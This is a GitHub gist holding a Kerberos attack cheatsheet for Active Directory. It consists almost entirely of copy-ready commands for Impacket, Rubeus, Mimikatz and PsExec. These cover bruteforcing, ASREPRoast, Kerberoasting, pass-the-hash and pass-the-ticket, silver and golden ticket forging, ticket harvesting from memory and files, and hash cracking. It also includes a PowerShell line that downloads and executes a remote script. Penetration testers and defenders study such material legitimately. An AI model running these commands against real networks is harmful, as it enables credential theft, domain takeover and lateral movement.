Skip to content

Instantly share code, notes, and snippets.

@TarlogicSecurity

TarlogicSecurity/kerberos_attacks_cheatsheet.md

Created May 14, 2019 13:33
Show Gist options
  • Save TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a to your computer and use it in GitHub Desktop.
Save TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a to your computer and use it in GitHub Desktop.
Download ZIP

Revisions

  1. TarlogicSecurity created this gist May 14, 2019.
    285 changes: 285 additions & 0 deletions kerberos_attacks_cheatsheet.md
    View file
    Original file line number Diff line number Diff line change
    @@ -0,0 +1,285 @@
    # Kerberos cheatsheet

    ## Bruteforcing

    With [kerbrute.py](https://github.com/TarlogicSecurity/kerbrute):
    ```shell
    python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
    ```

    With [Rubeus](https://github.com/Zer1t0/Rubeus) version with brute module:
    ```shell
    # with a list of users
    .\Rubeus.exe brute /users:<users_file> /passwords:<passwords_file> /domain:<domain_name> /outfile:<output_file>

    # check passwords for all users in current domain
    .\Rubeus.exe brute /passwords:<passwords_file> /outfile:<output_file>
    ```

    ## ASREPRoast

    With [Impacket](https://github.com/SecureAuthCorp/impacket) example GetNPUsers.py:
    ```shell
    # check ASREPRoast for all domain users (credentials required)
    python GetNPUsers.py <domain_name>/<domain_user>:<domain_user_password> -request -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>

    # check ASREPRoast for a list of users (no credentials required)
    python GetNPUsers.py <domain_name>/ -usersfile <users_file> -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>
    ```

    With [Rubeus](https://github.com/GhostPack/Rubeus):
    ```shell
    # check ASREPRoast for all users in current domain
    .\Rubeus.exe asreproast /format:<AS_REP_responses_format [hashcat | john]> /outfile:<output_hashes_file>
    ```

    Cracking with dictionary of passwords:
    ```shell
    hashcat -m 18200 -a 0 <AS_REP_responses_file> <passwords_file>

    john --wordlist=<passwords_file> <AS_REP_responses_file>
    ```


    ## Kerberoasting

    With [Impacket](https://github.com/SecureAuthCorp/impacket) example GetUserSPNs.py:
    ```shell
    python GetUserSPNs.py <domain_name>/<domain_user>:<domain_user_password> -outputfile <output_TGSs_file>
    ```


    With [Rubeus](https://github.com/GhostPack/Rubeus):
    ```shell
    .\Rubeus.exe kerberoast /outfile:<output_TGSs_file>
    ```

    With **Powershell**:
    ```
    iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1")
    Invoke-Kerberoast -OutputFormat <TGSs_format [hashcat | john]> | % { $_.Hash } | Out-File -Encoding ASCII <output_TGSs_file>
    ```

    Cracking with dictionary of passwords:
    ```shell
    hashcat -m 13100 --force <TGSs_file> <passwords_file>

    john --format=krb5tgs --wordlist=<passwords_file> <AS_REP_responses_file>
    ```


    ## Overpass The Hash/Pass The Key (PTK)

    By using [Impacket](https://github.com/SecureAuthCorp/impacket) examples:
    ```shell
    # Request the TGT with hash
    python getTGT.py <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash>
    # Request the TGT with aesKey (more secure encryption, probably more stealth due is the used by default by Microsoft)
    python getTGT.py <domain_name>/<user_name> -aesKey <aes_key>
    # Request the TGT with password
    python getTGT.py <domain_name>/<user_name>:[password]
    # If not provided, password is asked

    # Set the TGT for impacket use
    export KRB5CCNAME=<TGT_ccache_file>

    # Execute remote commands with any of the following by using the TGT
    python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
    python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
    python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
    ```


    With [Rubeus](https://github.com/GhostPack/Rubeus) and [PsExec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec):
    ```shell
    # Ask and inject the ticket
    .\Rubeus.exe asktgt /domain:<domain_name> /user:<user_name> /rc4:<ntlm_hash> /ptt

    # Execute a cmd in the remote machine
    .\PsExec.exe -accepteula \\<remote_hostname> cmd
    ```



    ## Pass The Ticket (PTT)

    ### Harvest tickets from Linux

    Check type and location of tickets:

    ```shell
    grep default_ccache_name /etc/krb5.conf
    ```
    If none return, default is FILE:/tmp/krb5cc_%{uid}.

    In case of file tickets, you can copy-paste (if you have permissions) for use them.

    In case of being *KEYRING* tickets, you can use [tickey](https://github.com/TarlogicSecurity/tickey) to get them:

    ```shell
    # To dump current user tickets, if root, try to dump them all by injecting in other user processes
    # to inject, copy tickey in a reachable folder by all users
    cp tickey /tmp/tickey
    /tmp/tickey -i
    ```

    ### Harvest tickets from Windows

    With [Mimikatz](https://github.com/gentilkiwi/mimikatz):
    ```shell
    mimikatz # sekurlsa::tickets /export
    ```

    With [Rubeus](https://github.com/GhostPack/Rubeus) in Powershell:
    ```shell
    .\Rubeus dump

    # After dump with Rubeus tickets in base64, to write the in a file
    [IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<bas64_ticket>"))
    ```


    To convert tickets between Linux/Windows format with [ticket_converter.py](https://github.com/Zer1t0/ticket_converter):

    ```
    python ticket_converter.py ticket.kirbi ticket.ccache
    python ticket_converter.py ticket.ccache ticket.kirbi
    ```

    ### Using ticket in Linux:

    With [Impacket](https://github.com/SecureAuthCorp/impacket) examples:
    ```shell
    # Set the ticket for impacket use
    export KRB5CCNAME=<TGT_ccache_file_path>

    # Execute remote commands with any of the following by using the TGT
    python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
    python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
    python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
    ```


    ### Using ticket in Windows

    Inject ticket with [Mimikatz](https://github.com/gentilkiwi/mimikatz):
    ```shell
    mimikatz # kerberos::ptt <ticket_kirbi_file>
    ```

    Inject ticket with [Rubeus](https://github.com/GhostPack/Rubeus):
    ```shell
    .\Rubeus.exe ptt /ticket:<ticket_kirbi_file>
    ```

    Execute a cmd in the remote machine with [PsExec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec):
    ```shell
    .\PsExec.exe -accepteula \\<remote_hostname> cmd
    ```

    ## Silver ticket

    With [Impacket](https://github.com/SecureAuthCorp/impacket) examples:
    ```shell
    # To generate the TGS with NTLM
    python ticketer.py -nthash <ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn> <user_name>

    # To generate the TGS with AES key
    python ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn> <user_name>

    # Set the ticket for impacket use
    export KRB5CCNAME=<TGS_ccache_file>

    # Execute remote commands with any of the following by using the TGT
    python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
    python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
    python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
    ```

    With [Mimikatz](https://github.com/gentilkiwi/mimikatz):
    ```shell
    # To generate the TGS with NTLM
    mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /rc4:<ntlm_hash> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>

    # To generate the TGS with AES 128 key
    mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes128:<krbtgt_aes128_key> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>

    # To generate the TGS with AES 256 key (more secure encryption, probably more stealth due is the used by default by Microsoft)
    mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes256:<krbtgt_aes256_key> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>

    # Inject TGS with Mimikatz
    mimikatz # kerberos::ptt <ticket_kirbi_file>
    ```

    Inject ticket with [Rubeus](https://github.com/GhostPack/Rubeus):
    ```shell
    .\Rubeus.exe ptt /ticket:<ticket_kirbi_file>
    ```

    Execute a cmd in the remote machine with [PsExec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec):
    ```shell
    .\PsExec.exe -accepteula \\<remote_hostname> cmd
    ```

    ## Golden ticket

    With [Impacket](https://github.com/SecureAuthCorp/impacket) examples:
    ```shell
    # To generate the TGT with NTLM
    python ticketer.py -nthash <krbtgt_ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> <user_name>

    # To generate the TGT with AES key
    python ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name> <user_name>

    # Set the ticket for impacket use
    export KRB5CCNAME=<TGS_ccache_file>

    # Execute remote commands with any of the following by using the TGT
    python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
    python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
    python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
    ```


    With [Mimikatz](https://github.com/gentilkiwi/mimikatz):
    ```shell
    # To generate the TGT with NTLM
    mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /rc4:<krbtgt_ntlm_hash> /user:<user_name>

    # To generate the TGT with AES 128 key
    mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes128:<krbtgt_aes128_key> /user:<user_name>

    # To generate the TGT with AES 256 key (more secure encryption, probably more stealth due is the used by default by Microsoft)
    mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes256:<krbtgt_aes256_key> /user:<user_name>

    # Inject TGT with Mimikatz
    mimikatz # kerberos::ptt <ticket_kirbi_file>
    ```

    Inject ticket with [Rubeus](https://github.com/GhostPack/Rubeus):
    ```shell
    .\Rubeus.exe ptt /ticket:<ticket_kirbi_file>
    ```

    Execute a cmd in the remote machine with [PsExec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec):
    ```shell
    .\PsExec.exe -accepteula \\<remote_hostname> cmd
    ```

    ## Misc

    To get NTLM from password:
    ```python
    python -c 'import hashlib,binascii; print binascii.hexlify(hashlib.new("md4", "<password>".encode("utf-16le")).digest())'
    ```

    ## Tools

    * [Impacket](https://github.com/SecureAuthCorp/impacket)
    * [Mimikatz](https://github.com/gentilkiwi/mimikatz)
    * [Rubeus](https://github.com/GhostPack/Rubeus)
    * [Rubeus](https://github.com/Zer1t0/Rubeus) with brute module
    * [PsExec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec)
    * [kerbrute.py](https://github.com/TarlogicSecurity/kerbrute)
    * [tickey](https://github.com/TarlogicSecurity/tickey)
    * [ticket_converter.py](https://github.com/Zer1t0/ticket_converter)